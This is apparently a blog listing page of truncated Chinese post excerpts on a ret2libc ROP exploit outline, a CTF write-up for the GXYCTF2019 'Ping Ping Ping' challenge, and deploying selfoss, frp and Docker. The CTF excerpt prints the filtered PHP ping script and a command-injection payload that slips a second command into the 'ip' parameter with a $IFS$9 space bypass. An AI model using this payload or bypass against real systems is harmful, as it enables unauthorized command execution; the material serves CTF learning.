shenghuo2's Blog

思路通过获取已经运行过的函数的信息，计算得出libc的版本，由于特定版本的偏移量是固定的，可以计算出来system和bin/sh的地址 然后通过构建ROP链执行system(’/bin/sh') 构建计算puts函数的pltputs_plt = elf.plt['puts'] 获取__libc_start_main的got表

##介绍 RSS(Really Simple Syndication)简易信息聚合（也叫聚合内容）是一种基于XML的标准，在互联网上被广泛采用的内容包装和投递协议。 可以像报纸一样订阅你个人喜爱的内容。 selfoss是一款网页rss阅读器，部署简单，功能丰富。 ##docker部署 拉取镜像部署 docker run --name selfoss -d -p 8000:8888 -e CRON_PERIOD=30m -v /root/selfoss:/selfoss/data hardware/selfoss 分别是访问端口800

例题[GXYCTF2019]Ping Ping Ping 目的是通过发送get请求绕过执行命令 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php if(isset($_GET['ip'])){ $ip = $_GET['ip']; if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else if(preg_match("/bash/", $ip)){ die("fxck your bash!"); } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ die("fxck your flag!"); } $a = shell_exec("ping -c 4 ".$ip); echo "<pre>"; print_r($a); } ?> 这是过滤脚本 用$IFS$9代替空格 我直接用的 循环套用打印出ls展示的文件 payload: xxxxx.node4.buuoj.cn:81/?ip=8.8.8.8;cat$IFS$9`ls` 命令执行的空格

##什么是frp## frp 是一个专注于内网穿透的高性能的反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 **项目地址：**https://github.com/fatedier/frp ##特性## 客户端服务端通信支持 T

介绍Docker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。 安装 先去BIOS开VT (CPU虚拟化) 然后开启Hyper-V 去控制面板

介绍Docker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。 概念 1）镜像images，事先做好一些基础功能（软件），可以在镜像上在